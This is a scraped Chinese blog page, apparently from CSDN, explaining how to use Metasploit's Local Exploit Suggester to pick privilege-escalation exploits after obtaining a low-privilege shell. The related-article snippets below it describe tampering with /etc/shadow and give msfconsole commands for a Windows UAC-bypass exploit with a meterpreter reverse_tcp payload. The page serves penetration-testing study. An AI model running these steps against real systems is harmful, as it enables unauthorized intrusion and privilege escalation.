MSF自动查找可用提权的EXP

最新推荐文章于 2025-05-10 21:12:36 发布

原创

最新推荐文章于 2025-05-10 21:12:36 发布 · 5.8k 阅读

8 ·

CC 4.0 BY-SA版权

文章标签：

#MSF #提权 #Linux提权 #exploit #EXP

在渗透测试中，已获取普通权限shell但需提权时，MSF的Local Exploit Suggester模块能推荐适用的提权EXP。通过设置session和相关参数，该工具提供可能的提权选项，虽然可能存在误报，但仍能有效指导提权尝试。文中通过实例演示了如何使用该模块成功提权。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

在渗透测试过程中，已经拿到反弹的普通权限shell，如果要再进一步提权，MSF可以提供丰富的提权EXP，但是具体用哪一个，我们不太好选择，漫无目的的去试极大得浪费时间。

为此，MSF专门提供了一个查找适用EXP的内置模块“Local Exploit Suggester”，如其名字一样，提供EXP建议，我们可以在MSF界面搜索suggester，找到他，并利用。

接下来设置其参数。

输入options查看需要设置的选项；

然后set session 6（这里session 6是我已经拿到的普通权限的shell session编号）；

最后run；

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Nathan8

关注关注

2
点赞
踩
8

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

权限提权——Win提权漏洞及数据库&AT&SC&PS提权

m0_61506558的博客

10-12

824

最近在上计算机组成原理的时候接触到了数据溢出，之前也接触过一点，对于PWN选手研究的会比较深，通过本篇文章，整理提权的常用方法.当你通过弱口令爆破、敏感文件读取、sql注入等漏洞获取到了管理员的账号和密码登入后台以后，需要提升自己的权限，就得在后台页面中寻找漏洞利用的点，成功上传webshell提升权限.(一）权限提升权限介绍提权可分为纵向提权与横向提权：纵向提权：低权限角色获得高权限角色的权限；横向提权：获取同级别角色的权限。

linux提权秘籍

失心少年

09-27

1245

uname -a/etc/阴影文件包含用户密码哈希，默认情况下，除root用户外，任何用户都无法读取。如果我们能够读取/etc/shadow文件的内容，我们可能能够破解根用户的密码哈希。如果我们能够修改/etc/shadow文件，我们就可以用一个我们知道的密码散列替换根用户的密码哈希。该文件历来包含的用户密码散列。为了向后兼容，如果/etc/passwd中的用户行的第二个字段包含密码哈希，那么它优先/etc/shadow中的哈希。

2 条评论您还未登录，请先登录后发表或查看评论

MSF模块查找详解

永远是少年

06-04

2583

【详解】MSF提权

最新发布

牛肉胡辣汤

05-10

1076

Metasploit Framework (MSF) 是一个强大的开源渗透测试框架，广泛用于安全评估和漏洞研究。在渗透测试中，获取目标系统的高权限是攻击者的主要目标之一。本文将探讨如何利用MSF进行提权操作，帮助渗透测试人员更好地理解系统安全。

msf查找提权权限exp

qq_42526270的博客

10-10

1186

00x01 在我们拿到一个反弹shell后，下一步可以用metaspolit的内置模块 Local Exploit Suggester Local-exploit-suggester的功能就如它的名字一样，当我们用它来探测某一个系统时，他会告诉我们该系统有哪些exploit可能可以利用。但是由于该工具先是假设一个系统存在所有的相关漏洞，然后根据补丁信息再去排除，所以就导致误报率会高一点，例如一台机...

msf+php脚本提权,MSF自动查找可用提权的EXP

weixin_33167915的博客

04-12

336

Selenium自动化测试框架基础学习(元素表单操作)(Selenium操作Selenium自动化测试框架基础学习(元素表单操作)(Selenium操作) 目录一、Selenium自动化测试框架 1.1什么是框架？ 1.2为什么使用框架? 1.3Selenium-webdriver工作原理 1.4selenium环境搭建(详情查阅讲义) 1.5什么是Selenium-IDE? 1.6IDE功能简...

如何改写msf的module为独立的exp？

Yale的博客

04-09

1160

如何改写msf的module为独立的exp？ 1 我们这次要用的模块名称为attftp_long_filename.rb,位于/usr/share/metasploit-framework/modules/exploits/windows/tftp/attftp_long_filename.rb，在接下来的时间中，我们要把它单独写成一个python脚本。模块完整的代码： 1.1 关键点我们接...

内网渗透常用提权方式总结

j1044957016的博客

06-01

8293

内网菜鸡艰难学习，希望一样的菜鸡能省去打开一堆链接的时间吧

网络对抗技术 20181314 Exp6 MSF基础应用

weixin_46014245的博客

04-26

488

一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答二、攻击过程记录任务一：主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击任务二：攻击浏览器的实践 ms07-017 ms11-050 任务三：攻击客户端的实践 Adobe ms10_046 任务四：成功应用任何一个辅助模块在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口加分项：测试2019年以后的漏洞三、实验遇到的问题及解决方法四、离实战还缺些什么技

soap注入某sql2008服务器结合msf进行提权

xiaoi123的博客

06-05

3497

原文作者：陈小兵在实际成功渗透过程中，漏洞的利用都是多个技术的融合，最新技术的实践，本次渗透利用sqlmap来确认注入点，通过sqlmap来获取webshell，结合msf来进行ms16-075的提权，最终获取了目标服务器的系统权限。本文算是漏洞利用的一个新的拓展，在常规Nday提权不成功的情况下，结合msf进行ms16-075成功提权的一个经典案例。1.1.1扫描soap注入漏洞 ...

msf exp脚本中引用的模块位置

YiLiuF的博客

05-22

398

【代码】msf exp脚本中引用的模块位置。

msfsuggester:使用OpenVAS XML输出的Metasploit漏洞利用建议程序

05-09

Msfsuggester Msfsuggester是一个解析OpenVAS XML输出并使用msfcli命令行从metasploit提出利用建议的工具。安装 $ git clone https://github.com/m0nad/msfsuggester $ gem install nokogiri 用法 ruby msfsuggester.rb openvas.xml /path/to/metasploit-framework/ 例子： $ ruby msfsuggester.rb OPENVAS_metasploitable.xml /home/monad/metasploit-framework/ == (GoodRanking) MySQL yaSSL CertDecoder::GetName Buffer Overflow == msfcli exploit/linux/

使用MSF进行提权（windows提权、linux提权、wesng使用

喜欢Python编程的程序员柚柚呀

02-29

1424

安全焦点，其BugTraq是一个出色的漏洞和exploit数据源，可以通过CVE编号，或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器（靶机）C:\RECYCLER\s.exe 目录（因为一般C:\RECYCLER\ 目录都有读写权限）选定需要使用的攻击模块之后，你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用，将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣，这将非常有用。为此，可以分别使用。

【漏洞复现】MSF添加ms17-010的exp脚本及攻击复现

weixin_30279671的博客

11-23

449

原文地址：https://bbs.ichunqiu.com/thread-23115-1-1.html 本来今晚在准备复现最近的CVE-2017-11882，由于本人是小白一枚，不知道这么添加msf的exp，一番搜索之后在I春秋看到大神的文章，觉得有用就尝试着试了一下，因此写这篇文，即为记录也为总结。一、添加新的exploit 首先是进入到我们msf的exp目录下：/usr/share/m...

2021-06-04msf结合漏扫模块suggester提权

qq_45290991的博客

06-04

767

转自月大佬的博客网站。。moonsec.com1、 windows 补丁审计工具使用在终端下可以使用命令systeminfo 来查看系统的一些补丁信息 http://www.demo1.com/asp.aspx 补丁检测Windows-Exploit-Suggester https://github.com/GDSSecurity/Windows-Exploit-Suggester 下载工具 git clone https://github.com/GDSSecurity/Windows-Exploit

Metasploit Framework-安全漏洞检测工具使用

mogexiuluo的博客

04-27

6570

一款开源的安全漏洞检测工具，简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等，为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块，并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中，通过msfconsole进入控制台。

【常用工具】MSF使用教程（一）漏洞扫描与利用（以永恒之蓝漏洞复现为例）

热门推荐

Fighting_hawk的博客

03-27

3万+

1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。

Kali玩转Metasploit 实现安全漏洞检测

追风筝的孩子

08-01

1万+

Metasploit就是一个漏洞框架,附带数百个已知的软件漏洞，并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的漏洞脚本，从而进行测试。！！！Metas...

干货|windows提权速查流程（收藏备用）

Appleteachers的博客

06-03

877

1.可利用漏洞信息收集收集本机systeminfo中补丁信息在提权辅助平台https://i.hacking8.com/tiquan/中查询可利用exp 然后查询exp，选择对应的Exp下载运行即可。 https://i.hacking8.com/ https://github.com/SecWiki/windows-kernel-exploits 提权Exp的运行方式，一般有以下几种：直接执行exe程序，成功后会打开一个cmd窗口，在新窗口中权限就是system在WebShell中执..

msf提权

03-08

### 如何使用 Metasploit Framework 进行提权操作 #### 了解 Metasploit Framework 的基本结构 Metasploit Framework 是一款强大的安全漏洞检测工具，能够帮助渗透测试人员发现并利用系统中的弱点。该框架由多个部分组成，其中包括 `exploit` 模块、`auxiliary` 辅助模块以及 Meterpreter 载荷等[^3]。 #### 寻找合适的提权 EXP 存储文件夹路径对于 Windows 平台上的本地提权漏洞而言，在 Linux 发行版中通常可以在 `/usr/share/metasploit-framework/modules/exploits/windows/local` 找到相应的 exploit 文件[^1]。这些文件包含了针对特定版本操作系统或应用程序的已知漏洞利用代码。 #### 启动 Metasploit Console 要启动 Metasploit 主界面，可以通过命令行输入 `msfconsole` 来实现。这将打开一个交互式的 shell 环境，使用户可以直接调用框架内的各个功能组件[^4]。 #### 加载与配置 Exploit 模块一旦进入了 console 界面之后，则可以根据之前找到的目标系统的具体信息加载对应的 exploit 模块。例如： ```bash use exploits/windows/local/bypassuac_vbsinject ``` 这条指令会加载名为 bypassuac_vbsinject 的 Windows 提权漏洞利用程序。接着设置必要的参数选项，比如指定目标机器的操作系统类型及其架构（32 或者 64 位）以及其他可能影响成功几率的因素。 #### 设置 Payload 及其选项为了完成整个攻击链路的设计，还需要定义好 payload——即被注入到受害主机上运行的有效负载。这里可以选择诸如 meterpreter/reverse_tcp 这样的远程控制型 payload，并为其设定监听 IP 地址和端口号等重要属性。 ```bash set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your_local_ip_address set LPORT any_available_port_number ``` #### 实施攻击并获取权限提升后的 Shell 访问当所有的准备工作都完成后就可以尝试发起真正的攻击行为啦！通过简单的 execute 命令即可触发选定好的 exploit 对象去尝试突破现有权限限制从而获得更高层次下的访问权利。 ```bash run ``` 如果一切顺利的话，此时应该已经得到了一个新的具有管理员级别特权的 session；接下来便可以借助于 Meterpreter 提供的各种内置命令进一步探索受控设备内部情况了！ #### 验证提权效果最后一步是要确认是否真的实现了预期的效果，也就是验证当前所处状态确实拥有超越普通用户的更多能力。可以试着读取一些只有超级管理账号才能接触到的数据资源作为检验依据之一。 ---